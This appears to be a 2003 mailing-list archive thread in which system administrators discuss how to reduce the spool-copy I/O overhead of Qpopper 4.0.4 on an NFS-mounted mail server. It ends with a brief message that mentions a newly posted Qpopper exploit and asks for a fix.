Messages On The Server" is bad. Really Bad. Especially
when these few<br>
people have mail spool files that are over 50 Mbytes in size. Some
of<br>
them even closer to 100 Mbytes (or over).<br><br>
Naturally, every time these people POP in, the system goes into
complete<br>
I/O and CPU starvation mode as all cycles get used up copying their
huge<br>
mail spools to /var/mail/.luser.pop and then back again to
/var/mail/luser.<br><br>
We have a 500 MHz Sun Blade 100 with 1 Gbyte of RAM running Solaris 8
2/02<br>
in the on-deck circle. It'll run a full-fledged POP/IMAP/WebMail
server<br>
with SPAM filtering, yadda yadda. But I haven't had time to get
that<br>
running yet - too many other fires to put out first. (Always the
story,<br>
isn't it?)<br><br>
In the interim, are there any steps I can take with Qpopper 4.0.4
to<br>
address this copy-to-.luser.pop-and-back-to-luser spool-file overhead
problem?<br><br>
Thanks in advance.<br><br>
<x-tab> </x-tab>-
Greg</blockquote>
<x-sigsep><p></x-sigsep>
---<br>
Tim Meader<br>
ODIN Unix Group<br>
ACS Government Services, Inc. - (301) 286-8013<br>
tmeader at cne-odin.gsfc.nasa dot gov</font></body>
</html>
--=====================_506101937==.ALT--
Subject: Re: Avoiding copy-to-.luser.pop-and-back-to-luser spool I/O overhead?
Date: Tue, 11 Mar 2003 10:19:56 -0800
From: Greg Earle <earle at isolar.DynDNS dot ORG>
Tim Meader wrote:
> Recompile qpopper with the options...
>
> --enable-servermode and if possible --enable-fast-update
>
> (note, there is a slight risk of problems using either or both of these if
> people are accessing their mailspools directly as well, such as through
> PINE or MUTT. Check the qpopper pdf file on the website for more info).
Read my followup. Unfortunately, this is exactly the case - "/var/mail" is
NFS-mounted everywhere. Sigh.
(Maybe I should get sneaky and recompile Pine/Mutt to only use POP/IMAP? heh)
> Also consider moving your temp drop directory to a different disk than the
> one the spool is on. You can redirect it with the
>
> --enable-temp-drop-dir=<directory>
>
> option. Note that this directory MUST have the same ownership and
> permissions as your maildrop directory.
That's an idea. Unfortunately the machine only has a single 1.05 Gbyte
internal SCSI drive (no room on it) and an 18 Gbyte drive on the outboard
SCSI bus. So I'd have to add a disk, and that wouldn't get it off of the
controller. Still, I guess it might help a little. Thanks for the suggestion.
(By "maildrop" I assume you mean "/var/mail", as in my present mail spool?)
Thanks,
- Greg
Date: Tue, 11 Mar 2003 13:22:24 -0500 (EST)
From: Alan Brown <alanb at digistar dot com>
Subject: Re: Avoiding copy-to-.luser.pop-and-back-to-luser spool I/O overhead?
On Tue, 11 Mar 2003, Greg Earle wrote:
> I forgot to add something important: "/var/mail" is NFS-mounted onto most
> every machine, as there are people still using things like the CDE "dtmail"
> MailTool, and ELM, Mutt, Mush, and so on, to read their mail "directly"
> over NFS. So, using "server mode" is, unfortunately, pretty much out.
Not necessarily.
It's only "out" if you can't get compatible locking in place, or if you
can't guarantee that the users who access directly won't pop3 at the
same time.
Date: Tue, 11 Mar 2003 10:49:00 -0800 (PST)
From: Gregory Hicks <ghicks at cadence dot com>
Subject: Re: Avoiding copy-to-.luser.pop-and-back-to-luser spool I/O overhead?
> Date: Tue, 11 Mar 2003 10:03:04 -0800
> From: Greg Earle <earle at isolar.dyndns dot org>
>
> I wrote:
> > OK, I'm embarrassed to ask such a newbie question, but ... here goes.
> >
> > I run a small departmental POP server at work. It serves maybe, oh, around
> > 70-100 people or so (just guessing). (So, to get ahead of myself a bit,
> > we don't really have enough people - read: entries in "/var/mail" - for
> > me to think that going to some two-level hash directory setup in the
> > spool will help me with my problem very much. Read on ... )
>
> I forgot to add something important: "/var/mail" is NFS-mounted onto most
You need to migrate the people away from this. For those that are
using dtmail, they can set dtmail to imap mode and have mail on the
server.
The hard part here is showing, and convincing, the users how they get
better service by NOT NFS mounting the mail spool and how service is
improved for everyone by not NFS mounting the spool directory.
I've done that. Part of the migration process was done by bringing up
a new, more powerful, mailserver and migrating user to that server. Of
course, the new server did NOT share anything - so the users could NOT
mount the spool.
One argument you could make is that the S-20/71 is old and maintenance
costs on a new server will be much lower... (True, by the way...)
> every machine, as there are people still using things like the CDE "dtmail"
> MailTool, and ELM, Mutt, Mush, and so on, to read their mail "directly"
mailtool users will have to migrate to dtmail. The others all have an
imap mode available. For those that don't want to migrate, fetchmail
is available so they would not notice anything different from their
present mode of operation.
My thoughts. Yours may vary...
Regards,
Gregory Hicks
> over NFS. So, using "server mode" is, unfortunately, pretty much out.
> (Yes, I know - it's an old, old setup that has been around for years.)
>
> (If we're going to force people to use POP/IMAP or some other access that
> doesn't let them get onto the server or NFS mount the spool, that'll have
> to be done as part of the migration to the future e-mail setup, not now.)
>
> Thanks,
>
> - Greg
>
>
-------------------------------------------------------------------
Gregory Hicks | Principal Systems Engineer
Cadence Design Systems | Direct: 408.576.3609
555 River Oaks Pkwy M/S 6B1 | Fax: 408.894.3400
San Jose, CA 95134 | Internet: ghicks at cadence dot com
"The trouble with doing anything right the first time is that nobody
appreciates how difficult it was."
When a team of dedicated individuals makes a commitment to act as
one... the sky's the limit.
Just because "We've always done it that way" is not necessarily a good
reason to continue to do so... Grace Hopper, Rear Admiral, United
States Navy
Date: Tue, 11 Mar 2003 14:41:19 -0500 (EST)
From: Alan Brown <alanb at digistar dot com>
Subject: Re: Avoiding copy-to-.luser.pop-and-back-to-luser spool I/O overhead?
On Tue, 11 Mar 2003, Greg Earle wrote:
> (Maybe I should get sneaky and recompile Pine/Mutt to only use POP/IMAP? heh)
No idea about Mutt, but you can force this in pine using pine.conf and
pine.conf.fixed...
AB
Subject: Re: Avoiding copy-to-.luser.pop-and-back-to-luser spool I/O overhead?
Date: Tue, 11 Mar 2003 10:58:16 -0800
From: Greg Earle <earle at isolar.DynDNS dot ORG>
>> Date: Tue, 11 Mar 2003 10:03:04 -0800
>> From: Greg Earle <earle at isolar.dyndns dot org>
>>
>> I wrote:
>>> OK, I'm embarrassed to ask such a newbie question, but ... here goes.
>>>
>>> I run a small departmental POP server at work. It serves maybe, oh, around
>>> 70-100 people or so (just guessing). (So, to get ahead of myself a bit,
>>> we don't really have enough people - read: entries in "/var/mail" - for
>>> me to think that going to some two-level hash directory setup in the
>>> spool will help me with my problem very much. Read on ... )
>>
>> I forgot to add something important: "/var/mail" is NFS-mounted onto most
>
> You need to migrate the people away from this. For those that are
> using dtmail, they can set dtmail to IMAP mode and have mail on the server.
>
> The hard part here is showing, and convincing, the users how they get
> better service by NOT NFS mounting the mail spool and how service is
> improved for everyone by not NFS mounting the spool directory.
>
> I've done that. Part of the migration process was done by bringing up
> a new, more powerful, mailserver and migrating user to that server. Of
> course, the new server did NOT share anything - so the users could NOT
> mount the spool.
>
> One argument you could make is that the SS-20/71 is old and maintenance
> costs on a new server will be much lower... (True, by the way...)
Yes, I know - thus my comments on having a Blade 100 in the on-deck circle :-)
I just can't get to it quite yet. Soon, I hope. Right now, I'm just
looking for a Band-Aid for my existing Qpopper 4.0.4 setup to help it
limp along until I can really cure the problem once and for all. I know
what the cure is :-)
Thanks to everyone for all the good suggestions so far.
- Greg
Date: Tue, 11 Mar 2003 16:45:09 -0500 (EST)
From: Brad Stockdale <brad at greenepa dot net>
Subject: Re: The Qpopper 4.0.x exploit
Hello all,
I'm sure by now you all have heard that there is a Qpopper 4.0.x
exploit going around... (If not, it was posted to bugtraq sometime this
morning I believe -- Should be findable on the bugtraq archives)
I've tested three servers, and indeed got a privileged shell with it.
Luckily, my companies pop server (which is running Qpopper 4.0.4) seems to
be immune to it, at least for the time being.
I was just wondering if anyone had a temporary or permanent fix for the
problem?
Thanks,
Brad
Last updated on 11 Mar 2003 by Pensive Mailing List Admin